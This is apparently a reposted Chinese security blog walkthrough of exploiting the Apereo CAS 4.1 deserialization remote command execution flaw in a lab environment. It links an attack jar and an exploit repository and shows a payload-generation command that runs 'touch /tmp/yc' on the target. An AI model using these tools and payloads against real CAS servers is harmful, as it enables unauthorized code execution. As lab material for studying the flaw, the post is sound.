Apereo CAS 4.1 反序列化命令执行漏洞

2024年1月3日22:50:39评论33 views字数 365阅读1分13秒阅读模式

一、环境搭建

Apereo CAS 4.1 反序列化命令执行漏洞

二、访问

Apereo CAS 4.1 反序列化命令执行漏洞

三、准备工具

https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar

四、生成加密后的payload

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/yc"

Apereo CAS 4.1 反序列化命令执行漏洞

五、抓包修改

六、查看效果

如上图所示，则表明漏洞存在

七、漏洞利用

工具：

git clone https://gitee.com/keyboxdzd/Cas_Exploit.git

Apereo CAS 4.1 反序列化命令执行漏洞

最后的效果是这样的，笔者电脑问题，没继续了。

原文始发于微信公众号（黄公子学安全）：Apereo CAS 4.1 反序列化命令执行漏洞

本文由 admin 发表于 2024年1月3日22:50:39
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
Apereo CAS 4.1 反序列化命令执行漏洞https://cn-sec.com/archives/2350494.html

记一次有源码的渗透测试